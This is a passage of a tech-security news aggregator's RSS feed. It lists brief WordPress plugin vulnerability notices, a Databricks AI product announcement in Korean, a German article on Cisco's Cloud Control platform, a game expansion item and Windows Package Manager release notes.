<description><![CDATA[On May 13th, 2026, we received a submission for a critical Unauthenticated Arbitrary File Deletion vulnerability in Avada Builder, a premium WordPress plugin with an estimated 1,000,000 active installations. This vulnerability makes it possible for unauthenticated attackers to delete arbitrary…
R...]]></description>
<link>https://tsecurity.de/de/3608488/it-security-nachrichten/critical-unauthenticated-arbitrary-file-deletion-vulnerability-patched-in-avada-builder-wordpress-plugin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608488/it-security-nachrichten/critical-unauthenticated-arbitrary-file-deletion-vulnerability-patched-in-avada-builder-wordpress-plugin/</guid>
<pubDate>Thu, 18 Jun 2026 19:09:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On May 13th, 2026, we received a submission for a critical Unauthenticated Arbitrary File Deletion vulnerability in Avada Builder, a premium WordPress plugin with an estimated 1,000,000 active installations. This vulnerability makes it possible for unauthenticated attackers to delete arbitrary…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-unauthenticated-arbitrary-file-deletion-vulnerability-patched-in-avada-builder-wordpress-plugin/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-unauthenticated-arbitrary-file-deletion-vulnerability-patched-in-avada-builder-wordpress-plugin/">Critical Unauthenticated Arbitrary File Deletion Vulnerability Patched in Avada Builder WordPress Plugin</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56009 | Bricksable for Bricks Builder Plugin up to 1.6.83 on WordPress cross site scripting (EUVD-2026-37873)]]></title>
<description><![CDATA[A vulnerability has been found in Bricksable for Bricks Builder Plugin up to 1.6.83 on WordPress and classified as problematic. Affected by this vulnerability is an unknown functionality. Performing a manipulation results in cross site scripting.

This vulnerability is reported as CVE-2026-56009....]]></description>
<link>https://tsecurity.de/de/3608294/sicherheitsluecken/cve-2026-56009-bricksable-for-bricks-builder-plugin-up-to-1683-on-wordpress-cross-site-scripting-euvd-2026-37873/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608294/sicherheitsluecken/cve-2026-56009-bricksable-for-bricks-builder-plugin-up-to-1683-on-wordpress-cross-site-scripting-euvd-2026-37873/</guid>
<pubDate>Thu, 18 Jun 2026 17:56:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/bricksable_for_bricks_builder_plugin">Bricksable for Bricks Builder Plugin up to 1.6.83</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality. Performing a manipulation results in cross site scripting.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-56009">CVE-2026-56009</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54194 | ThemeFusion Fusion Builder Plugin up to 3.15.4 on WordPress deserialization (EUVD-2026-37509)]]></title>
<description><![CDATA[A vulnerability was found in ThemeFusion Fusion Builder Plugin up to 3.15.4 on WordPress and classified as critical. The affected element is an unknown function. Such manipulation leads to deserialization.

This vulnerability is traded as CVE-2026-54194. The attack may be launched remotely. There...]]></description>
<link>https://tsecurity.de/de/3606482/sicherheitsluecken/cve-2026-54194-themefusion-fusion-builder-plugin-up-to-3154-on-wordpress-deserialization-euvd-2026-37509/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606482/sicherheitsluecken/cve-2026-54194-themefusion-fusion-builder-plugin-up-to-3154-on-wordpress-deserialization-euvd-2026-37509/</guid>
<pubDate>Thu, 18 Jun 2026 03:53:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/themefusion:fusion_builder_plugin">ThemeFusion Fusion Builder Plugin up to 3.15.4</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is an unknown function. Such manipulation leads to deserialization.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-54194">CVE-2026-54194</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54193 | meFusion Fusion Builder Plugin up to 3.15.4 on WordPress path traversal (EUVD-2026-37715)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in meFusion Fusion Builder Plugin up to 3.15.4 on WordPress. Affected is an unknown function. Executing a manipulation can lead to path traversal.

This vulnerability is tracked as CVE-2026-54193. The attack can be launched remotely. No...]]></description>
<link>https://tsecurity.de/de/3606274/sicherheitsluecken/cve-2026-54193-mefusion-fusion-builder-plugin-up-to-3154-on-wordpress-path-traversal-euvd-2026-37715/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606274/sicherheitsluecken/cve-2026-54193-mefusion-fusion-builder-plugin-up-to-3154-on-wordpress-path-traversal-euvd-2026-37715/</guid>
<pubDate>Thu, 18 Jun 2026 00:21:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/mefusion:fusion_builder_plugin">meFusion Fusion Builder Plugin up to 3.15.4</a> on WordPress. Affected is an unknown function. Executing a manipulation can lead to path traversal.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-54193">CVE-2026-54193</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[How WordPress Agencies Really Operate in 2026, and Where the Work Is Piling Up]]></title>
<description><![CDATA[Most conversations about the WordPress ecosystem focus on the platform: the block editor, the ongoing builder wars, the plugin marketplace. The agencies running client WordPress sites at scale rarely get that attention. They should. 
CloudLinux and WebPros surveyed 210 WordPress agencies and free...]]></description>
<link>https://tsecurity.de/de/3605204/unix-server/how-wordpress-agencies-really-operate-in-2026-and-where-the-work-is-piling-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605204/unix-server/how-wordpress-agencies-really-operate-in-2026-and-where-the-work-is-piling-up/</guid>
<pubDate>Wed, 17 Jun 2026 17:01:55 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/how-wordpress-agencies-really-operate-in-2026-and-where-the-work-is-piling-up" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/TSWA26_ReportCover_Thumbnail.png" alt="How WordPress Agencies Really Operate in 2026, and Where the Work Is Piling Up" class="hs-featured-image"> </a> 
</div> 
<p><span>Most conversations about the WordPress ecosystem focus on the platform: the block editor, the ongoing builder wars, the plugin marketplace. The agencies running client WordPress sites at scale rarely get that attention. They should.</span></p> 
<p><span>CloudLinux and WebPros surveyed 210 WordPress agencies and freelancers to find out how they operate: where they run client sites, how they handle security and performance, and what they expect AI to do for them next. Selected insights and the link to the full report are in this post.<br></span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[데이터브릭스, 기업 업무 자동화 지원 AI 플랫폼 ‘지니 원’ 공개]]></title>
<description><![CDATA[지니 원은 데이터브릭스의 AI 제품군인 ‘지니(Genie)’의 일부로, 기업 데이터를 기반으로 답변 생성과 업무 수행을 지원한다.



데이터브릭스에 따르면, 지니의 핵심은 조직 내 데이터, 문서, 애플리케이션, 사람 등에서 축적되는 지식을 연결하는 ‘지니 온톨로지(Genie Ontology)’다. 데이터브릭스는 이를 통해 데이터브릭스 환경은 물론 파일, 채팅, 회의, 티켓 등 다양한 업무 시스템에서 비즈니스 맥락을 자동으로 수집·업데이트한다고 설명했다.



이에 따라 AI는 추론에 의존하기보다 거버넌스가 적용된 데이터를 기...]]></description>
<link>https://tsecurity.de/de/3603979/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603979/it-nachrichten/ai/</guid>
<pubDate>Wed, 17 Jun 2026 10:03:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>지니 원은 데이터브릭스의 AI 제품군인 ‘지니(Genie)’의 일부로, 기업 데이터를 기반으로 답변 생성과 업무 수행을 지원한다.</p>



<p>데이터브릭스에 따르면, 지니의 핵심은 조직 내 데이터, 문서, 애플리케이션, 사람 등에서 축적되는 지식을 연결하는 ‘지니 온톨로지(Genie Ontology)’다. 데이터브릭스는 이를 통해 데이터브릭스 환경은 물론 파일, 채팅, 회의, 티켓 등 다양한 업무 시스템에서 비즈니스 맥락을 자동으로 수집·업데이트한다고 설명했다.</p>



<p>이에 따라 AI는 추론에 의존하기보다 거버넌스가 적용된 데이터를 기반으로 답변을 생성하고 업무를 수행할 수 있어 정확성을 높이고 비용과 지연 시간을 줄일 수 있다는 것이 회사 측 설명이다.</p>



<p>데이터브릭스 공동설립자 겸 CEO 알리 고드시는 “많은 기업용 AI가 충분한 맥락 없이 답변을 생성하고 있다”라며 “지니 온톨로리는 다양한 데이터에서 지속적으로 맥락을 학습해 더 정확하고 빠른 답변을 제공한다”라고 밝혔다.</p>



<p>지니 원은 웹, iOS, 안드로이드에서 사용할 수 있다. 기존 지니가 데이터브릭스 내 데이터 분석에 초점을 맞췄다면, 지니 원은 외부 애플리케이션과 데이터까지 연결 범위를 확대했다. 사용자는 문서와 보고서 생성, 업무 자동화, 알림 설정, 데이터 시각화 등의 기능을 활용할 수 있다.</p>



<p>함께 공개된 지니 에이전트(Genie Agents)는 사용자가 만든 대화를 재사용 가능한 AI 에이전트로 저장해 조직 내에서 공유할 수 있도록 지원한다. 지니 앱 빌더(Genie App Builder)는 기업용 애플리케이션을 개발할 수 있는 관리형 개발 환경으로, 유니티 카탈로그(Unity Catalog) 기반의 권한 관리 기능을 제공한다.</p>



<p>이와 함께 데이터 엔지니어링과 머신러닝 업무를 지원하는 ‘지니 코드(Genie Code)’, 데이터 및 AI 자산을 모니터링하는 운영 자동화 기능 ‘지니 제로옵스(Genie ZeroOps)’도 공개됐다.</p>



<p>지니 원, 지니 에이전트, 지니 코드는 현재 정식 출시됐다. 지니 앱 빌더와 지니 제로옵스는 데이터+AI 서밋(Data + AI Summit) 이후 비공개 프리뷰로 제공될 예정이다. 데이터브릭스는 사용자당 월 최대 10달러(약 1만 4,000원)의 무료 크레딧을 제공하며, 실제 사용량에 대해서만 비용을 부과한다고 밝혔다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Jeetu Patel Cisco bis zur Unkenntlichkeit verändert hat]]></title>
<description><![CDATA[width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px">Ciscos Chief Product Officer Jeetu Patel auf der Cisco Live US 2026Cisco



Auf der Cisco Live 2026 war es Zeit für Jeetu Patel, Chief Product Officer von Cisco, ein vor 24 Monaten gegebenes Versprechen einzulösen. Zwei Jah...]]></description>
<link>https://tsecurity.de/de/3602096/it-security-nachrichten/wie-jeetu-patel-cisco-bis-zur-unkenntlichkeit-veraendert-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602096/it-security-nachrichten/wie-jeetu-patel-cisco-bis-zur-unkenntlichkeit-veraendert-hat/</guid>
<pubDate>Tue, 16 Jun 2026 16:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"> width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Ciscos Chief Product Officer Jeetu Patel auf der Cisco Live US 2026</p><br></figcaption></figure><p class="imageCredit">Cisco</p></div>



<p>Auf der <a href="https://www.ciscolive.com/" target="_blank" rel="noreferrer noopener">Cisco Live 2026</a> war es Zeit für <a href="https://www.linkedin.com/in/jeetupatel" target="_blank" rel="noreferrer noopener">Jeetu Patel</a>, Chief Product Officer von Cisco, ein vor 24 Monaten gegebenes Versprechen einzulösen. Zwei Jahre zuvor hatte der Manager versprochen, dass <a href="https://www.cisco.com/">Cisco</a> in zwei Jahren  kaum wiederzuerkennen sein würde – im positiven Sinne, versteht sich.</p>



<p>Die auf der Veranstaltung vorgestellten Innovationen lassen darauf schließen, dass er sein Versprechen tatsächlich weitgehend eingelöst hat. Cisco positioniert sich neu: weg von einer Holding-Gesellschaft für Produkte und Dashboards hin zu einer einheitlichen, KI-nativen Infrastrukturplattform. Dabei fungiert Cloud Control als Steuerungsebene, Cisco IQ als CX-Zentrum und Secure Networking als verbindendes Element.</p>



<p>Dieser Wandel betrifft nicht nur neue Funktionen, sondern ein völlig neues Betriebsmodell. Cisco schafft eine Umgebung, in der sich menschliche Administratoren und KI-Agenten dieselben Daten, denselben Kontext und dieselben Handlungsmöglichkeiten teilen, wobei die Menschen die Kontrolle behalten.</p>



<h2 class="wp-block-heading">Vom Dashboard-Wust zu Cloud Control</h2>



<p>Der sichtbarste Beweis für das „neue“ Cisco ist <strong>Cloud Control</strong>, eine einheitliche Management-Plattform für Networking, Security, Compute, Observability, Collaboration und ein wachsendes Ökosystem von Drittanbieter-Tools. Cisco betont, dass es sich hierbei nicht nur um eine weitere zentrale Übersicht handelt. Stattdessen ist es  eine aktive Ausführungsumgebung, in der Richtlinien und Identitäten direkt in den Steuerungsprozess integriert sind. Die Plattform wurde von Grund auf dafür konzipiert, dass Menschen und KI-Agenten die Infrastruktur gemeinsam betreiben.</p>



<p>Wenn sich Betreiber in Cloud Control anmelden, sehen sie eine vertraute, ChatGPT-ähnliche Oberfläche mit drei Modi:</p>



<ul class="wp-block-list">
<li><strong>„Assistant“</strong> ermöglicht es Betreibern, mit der Plattform in natürlicher Sprache zu kommunizieren.</li>



<li><strong>„Canvas“</strong> bietet einen Arbeitsbereich für mehrere Nutzer, in dem Menschen und Agenten gemeinsam Probleme untersuchen und lösen können.</li>



<li><strong>„Actions“</strong> fungiert als Leitstelle zur Überwachung dessen, was Agenten vorschlagen und ausführen.</li>
</ul>



<p>Cloud Control stellt zudem gemeinsame Plattformdienste wie Bestands- und Topologieinformationen über die gesamte Cisco-Infrastruktur hinweg bereit. Meraki, Intersight, Sicherheitsdienste, Splunk, Webex Control Hub und Cisco IQ sind alle mit einem einzigen Login zugänglich. Damit entfällt der Wechsel zwischen mehreren Dashboards und Authentifizierungsdomänen, stattdessen können sich die Betreiber nahtlos zwischen Plattformdiensten und Produkterfahrungen innerhalb derselben Umgebung bewegen.</p>



<h2 class="wp-block-heading">Cloud Control als „KI-Harness“, nicht als Konsole</h2>



<p>Technisch basiert Cloud Control auf einer gemeinsamen Datenstruktur, die Telemetriedaten aus Benutzern, Geräten, Anwendungen, Netzwerken und Bedrohungen korreliert. Diese Datenbasis dient sowohl menschlichen Entscheidungen als auch agentengestützter Automatisierung.</p>



<p>Cisco beschreibt diesen Wandel als Übergang von „Infrastructure as Code“ zu „Infrastructure as a Harness“. Anstatt ausschließlich von Menschen geschriebene Skripte und Playbooks zu verwenden, wird Cloud Control zur kontrollierten Umgebung, in der KI-Agenten Systeme beobachten, analysieren und sicher steuern können.</p>



<p>Drei zentrale Komponenten prägen diesen Ansatz:</p>



<ul class="wp-block-list">
<li><strong>„AI Canvas“</strong> bildet den Arbeitsbereich, in dem Menschen und Agenten gemeinsam Vorfälle untersuchen, wobei der Kontext über Schichten und Eskalationen hinweg erhalten bleibt.</li>



<li>Das „<strong>Cloud Control Studio“</strong> ermöglicht Kunden und Partnern, mit Agent Builder und App Buildermithilfe natürlicher Sprache und integrierter Programmierassistenten ihre eigenen Agenten und Anwendungen auf Basis der Daten, Richtlinien und der Steuerungsebene von Cisco zu erstellen .</li>



<li>Der<strong> „Cloud Control Marketplace“</strong> stellt Eigenentwicklungen und Partnerlösungen über einen zentralen Marktplatz zur Verfügung.</li>
</ul>



<p>Aus Sicht von Unternehmen wandelt sich Cloud Control damit von einer Plattform „zum Durchklicken von Einstellungen“ zu einer sicheren Plattform für agentengestützte IT-Prozesse: Eine geregelte Umgebung, in der KI-Agenten durchgängig bereitgestellt, überwacht, eingeschränkt und geprüft werden können. Dies ist ein ganz anderes Konzept als die herkömmliche Netzwerkmanagement-Konsole.</p>



<h2 class="wp-block-heading">Ein gemeinsames „Gehirn“ für Customer Experience und Produkte</h2>



<p>Unter der Leitung von <a href="https://www.linkedin.com/in/lizcentoni/" target="_blank" rel="noreferrer noopener">Liz Centoni</a>, Executive Vice President und General Manager, hat Cisco zudem seine Customer-Experience-Organisation (CX) grundlegend umgebaut. Lange Zeit wirkten die CX- und Produktorganisationen wie zwei Parallelwelten: Services wurden auf Produkte aufgesetzt, statt eng mit deren Funktionsweise verzahnt zu sein. Um diese Lücke zu schließen, arbeitete Centoni eng mit Patel zusammen, um sicherzustellen, dass Produktentwicklung und CX vollständig aufeinander abgestimmt sind.</p>



<p><strong>Cisco IQ</strong> verändert diese Dynamik, indem die modernisierten CX-Funktionen direkt in die gleiche Cloud-Control-Umgebung integriert werden, in der auch die Produkte betrieben werden. Zudem werden die CX-Workflows an dieselbe Telemetrie- und Policy-Ebene angebunden. Bemerkenswert ist dabei, dass Cisco IQ nicht einfach ein weiteres Dashboard ist, sondern ein integraler Bestandteil von Cloud Control.</p>



<p>Cisco IQ ist als KI-gestützte Plattform für Support und Professional Services positioniert. Ziel ist es, Kunden vollständige Transparenz über die gesamte IT-Landschaft, proaktive Ausfallsicherheit, schnellere Problemlösungen und kontextbezogene Services zu bieten. Die Lösung wird als SaaS-Plattform bereitgestellt, kann aber für Kunden mit strengen Anforderungen an Datenhoheit auch On-Premises betrieben werden.</p>



<p>Durch die Nutzung der gemeinsamen Data Fabric kann Cisco:</p>



<ul class="wp-block-list">
<li><strong>IQ Assets</strong> inventarisieren, unabhängig davon, ob sie bereits im Einsatz sind oder sich noch im Lager befinden,</li>



<li>Risiken kennzeichnen, bevor Kunden Probleme erleben, und</li>



<li>die Sicherheitslage eines Unternehmens anhand anonymisierter Vergleichswerte nach Branche, Marktsegment oder Region benchmarken.</li>
</ul>



<p>Neue Funktionen unterstreichen die enge Verzahnung von CX und Produktentwicklung weiter:</p>



<ul class="wp-block-list">
<li>„<strong>Resilient Infrastructure Services</strong>“ nutzt ein dreistufiges Framework aus Expositionsbewertung, Infrastrukturmodernisierung und Verteidigungsresilienz, um Kunden bei der Vorbereitung auf Bedrohungen nach dem „Frontier-Modell“ zu unterstützen.</li>



<li><strong>„Quantum Ready Assessments“</strong>, die über Cisco IQ bereitgestellt werden, identifizieren Systeme, die besonders anfällig für sogenannte „Harvest Now, Decrypt Later“-Angriffe sind, und zeigen einen Weg zu einer quantensicheren Infrastruktur auf.</li>
</ul>



<p>Die Verlagerung des „CX-Gehirns“ in Cloud Control und dessen Anbindung an dieselben Daten- und KI-Modelle, die auch den operativen Betrieb steuern, stellt sowohl kulturell als auch architektonisch einen grundlegenden Wandel dar.</p>



<h2 class="wp-block-heading">Secure Networking als Beweis für die Integration</h2>



<p>Wer verstehen möchte, wie stark das neue Cisco inzwischen integriert ist, sollte sich den Bereich Secure Networking ansehen.</p>



<p>Ciscos Vision besteht darin, Sicherheit direkt in die Infrastruktur einzubetten – vom Silizium über das Netzwerk bis hin zum operativen Betrieb –, statt sie als separaten Technologie-Stack zu behandeln.</p>



<p>Diese Strategie manifestiert sich auf verschiedene, konkrete Weisen.</p>



<p><strong>Live Protect</strong>, intern als „digitales Immunsystem“ bezeichnet, wendet präzise Ausgleichskontrollen auf Cisco-Produkte im Betrieb an, um diese vor neu entdeckten Schwachstellen zur Laufzeit zu schützen. Dies geschieht ohne Neustarts, Upgrades oder Wartungsfenster. Die Kontrollen sind zielgerichtet eingesetzt, um Leistungseinbußen zu vermeiden und Fehlalarme zu minimieren.</p>



<p>Live Protect ist bereits auf Nexus-9000-Switches verfügbar und wird auf das gesamte Portfolio ausgeweitet, einschließlich Campus-Switches, wodurch die Rückkopplungsschleife zwischen der Entdeckung von Schwachstellen und deren Behebung von Wochen auf Minuten verkürzt wird.</p>



<p>Die <strong>Hybrid Mesh Firewall</strong> erweitert einheitliche Sicherheitsrichtlinien über Netzwerke, Anwendungen sowie Firewalls von Cisco und Drittanbietern hinweg und begrenzt so den Schadensumfang, wenn etwas schiefgeht.</p>



<p>Gleichzeitig integriert Cisco Post-Quantum-Krypto-Bibliotheken, Secure Boot und Trust Anchors in sein Kernportfolio und hat sich verpflichtet, bis Dezember 2026 quantensichere Kommunikationsfunktionen für die meisten Kernprodukte bereitzustellen. Neue Router-, Switch- und Firewall-Serien für Unternehmen und Rechenzentren werden als „standardmäßig quantensicher“ auf den Markt gebracht.</p>



<p>All dies wird über Cloud Control orchestriert, laut Cisco die Sicherheitsleitstelle für die Zeit nach Mythos. Dabei stellt Splunk das Telemetrie-Backbone sowie agentenbasierte SOC- und SRE-Funktionen bereit. Auf diese Weise soll es möglich sein, Vorfälle mit maschineller Geschwindigkeit zu erkennen, zu priorisieren und darauf zu reagieren.</p>



<p>Secure Networking ist damit mehr als klassische Firewalls oder SD-WAN. Es bildet das Rückgrat, das Ciscos Netzwerk-, Sicherheits-, Observability- und KI-Ressourcen zu einer einheitlichen Plattform verbindet.</p>



<h2 class="wp-block-heading">Multicloud Fabric: Networking as a Service für KI</h2>



<p>Ein weiteres Kennzeichen des neuen Cisco ist die Bereitschaft, Netzwerke als vollständig verwaltete Fabric bereitzustellen, anstatt Kunden lediglich Werkzeuge in die Hand zu drücken, die selbst zusammenstellen müssen.</p>



<p><strong>„Multicloud Fabric“</strong> veranschaulicht diesen Wandel. Die Lösung wird als Network-as-a-Service-Angebot über Cloud Control bereitgestellt und bietet Unternehmen eine einheitliche Struktur für sicheres Site-to-Cloud- und Cloud-to-Cloud-Networking. Cisco betreibt hierfür virtuelle Points of Presence (PoPs) bei den wichtigsten Cloud-Anbietern und in verschiedenen Regionen.</p>



<p>Kunden können dadurch Standorte und Cloud-Umgebungen einbinden, absichtsbasierte Konnektivität definieren, Sicherheitsrichtlinien zuweisen und die Leistung „mit einem Klick“ über Cloud Control überwachen, anstatt eigene Hub-and-Spoke-Architekturen aufzubauen und zu warten.</p>



<p>Sicherheit und Observability sind integriert – in Form von Zero-Trust-Routing, Cloud-Firewall-Service-Chaining sowie über in jeden Point of Presence eingebettete ThousandEyes-Agenten. Das Netzwerk ist somit nicht länger eine passive Leitung, sondern Teil des KI-Intelligence-Stacks.</p>



<p>Dies gewinnt an Bedeutung, da AI-First-Anwendungen zunehmend Inferenzprozesse über mehrere Clouds und Datenquellen hinweg ausführen. Cisco-eigene Untersuchungen zeigen, dass diese agentenbasierten Workflows ein Vielfaches an Netzwerkverkehr generieren können als manuelle Entsprechungen, wobei es sich bei einem Großteil um latenzempfindliche Inferenz handelt. Multicloud Fabric, das als Service betrieben und in dieselbe Cloud Control-Umgebung integriert ist, ist Ciscos Antwort auf diese neue Realität.</p>



<h2 class="wp-block-heading">Was bedeutet das für Kunden?</h2>



<p>Cisco hat vier Jahrzehnte damit verbracht, branchenführende Produkte zu entwickeln, von Meraki und Nexus bis hin zu Webex und ThousandEyes. Die größte Chance des Unternehmens lag jedoch schon immer darin, wie diese Komponenten zusammenwirken. Nämlich, wie es Patel formuliert, „eng integriert und dennoch lose gekoppelt“.</p>



<p>Cloud Control, Cisco IQ, Multicloud Fabric und Secure Networking deuten darauf hin, dass Cisco diese Lücke zunehmend schließt. Einzelne Dashboards werden zu agentischen Workflows und isolierte Produkte verwandeln sich in ein sicheres Gerüst für das KI-Zeitalter.</p>



<p>Für Kunden ist die Transformation von Cisco von Bedeutung, da sie nicht nur die Produktpalette, sondern auch das Betriebsmodell verändert. Cloud Control bietet IT-Teams eine einheitliche Verwaltungsebene für Netzwerke, Sicherheit, Observability, Zusammenarbeit und Dienste und ersetzt damit die fragmentierte Dashboard-Erfahrung, die für Cisco-Umgebungen lange Zeit eine Bürde waren. Dies dürfte den Betrieb schneller und einfacher machen, setzt aber auch höhere Anforderungen an die Kunden.</p>



<p>Da Cisco AgenticOps, AI Canvas, Live Protect und Cisco IQ in den Mainstream bringt, verschiebt sich die Rolle der IT von der manuellen Bedienung einzelner Werkzeuge hin zur Überwachung von KI-Agenten. Dieser Wandel erfordert neue Kompetenzen in den Bereichen Prompt-Design, Richtlinienmodellierung, Risikobewertung und Governance. Insbesondere, weil Agenten immer mehr Änderungen vorschlagen und testen, bevor Menschen überhaupt auf „Genehmigen“ klicken.</p>



<p>Für Kunden bedeutet dies auch einen Perspektivwechsel: Cisco sollte künftig weniger als Sammlung einzelner Best-of-Breed-Produkte betrachtet werden, sondern vielmehr als integrierte Plattform.</p>



<p>Je mehr der Cisco-Umgebung mit Cloud Control verknüpft ist, desto mehr Nutzen sollten Kunden aus gemeinsamer Telemetrie, einheitlichen Workflows, integrierter Sicherheit und domänenübergreifender Automatisierung ziehen – insbesondere in Bereichen wie Secure Networking und Multicloud-Betrieb.</p>



<p>Umgekehrt benötigen Kunden, deren Umgebungen weiterhin stark heterogen sind, klare Integrationsstrategien und Governance-Modelle, um sicherzustellen, dass Tools von Drittanbietern sicher in das System eingebunden werden können.</p>



<p>Der vielleicht größte Nutzen des neuen Cisco liegt in der Reduzierung von Komplexität – einem der größten Schmerzpunkte vieler Unternehmenskunden. Wenn das Unternehmen diese Vision umsetzen kann, werden Kunden möglicherweise feststellen, dass Cisco nicht nur auf positive Weise nicht wiederzuerkennen ist. Sondern auch einfacher zu kaufen, zu implementieren und zu betreiben ist als jemals zuvor. (mb)</p>



<p><em>Dieser Artikel basiert auf einem </em><a href="https://www.networkworld.com/article/4184554/how-jeetu-patel-made-cisco-unrecognizable.html"><em>Beitrag</em></a><em> der Network World.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fantasy city-builder Songs of Syx gets a major Reign of Terror expansion]]></title>
<description><![CDATA[Songs of Syx is a fantasy city-builder with vast real-time battles simulating tens of thousands of citizens and soldiers.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3601924/linux-tipps/fantasy-city-builder-songs-of-syx-gets-a-major-reign-of-terror-expansion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601924/linux-tipps/fantasy-city-builder-songs-of-syx-gets-a-major-reign-of-terror-expansion/</guid>
<pubDate>Tue, 16 Jun 2026 15:11:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Songs of Syx is a fantasy city-builder with vast real-time battles simulating tens of thousands of citizens and soldiers.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1770865288id29223gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/fantasy-city-builder-songs-of-syx-gets-a-major-reign-of-terror-expansion/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.28.220]]></title>
<description><![CDATA[This is a release candidate of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by filing an issue.
New in v1.28

Bumped the winget version to 1.28 to match the package version.
Additional options for limiting the size of log files.

New Feature: 'source edit'
N...]]></description>
<link>https://tsecurity.de/de/3601259/downloads/windows-package-manager-128220/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601259/downloads/windows-package-manager-128220/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:56 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a release candidate of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.28</h2>
<ul>
<li>Bumped the winget version to 1.28 to match the package version.</li>
<li>Additional <a href="https://github.com/microsoft/winget-cli/blob/master/doc/Settings.md#file">options for limiting the size of log files</a>.</li>
</ul>
<h1>New Feature: 'source edit'</h1>
<p>New feature that adds an 'edit' subcommand to the 'source' command. This can be used to set an explicit source to be implicit and vice-versa. For example, with this feature you can make the 'winget-font' source an implicit source instead of explicit source.</p>
<p>To use the feature, try <code>winget source edit winget-font</code> to set the Explicit state to the default.</p>
<h1>New Experimental Feature: 'listDetails'</h1>
<p>The new experimental feature <code>listDetails</code> enables a new option for the <code>list</code> command, <code>--details</code>.  When supplied, the output is no longer a table view of the results but is instead a series of <code>show</code> like outputs drawing data from the installed item.</p>
<p>An example output for a single installed package is:</p>
<div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&gt; wingetdev list Microsoft.VisualStudio.2022.Enterprise --details
Visual Studio Enterprise 2022 [Microsoft.VisualStudio.2022.Enterprise]
Version: 17.14.21 (November 2025)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\2022\Enterprise
Available Upgrades:
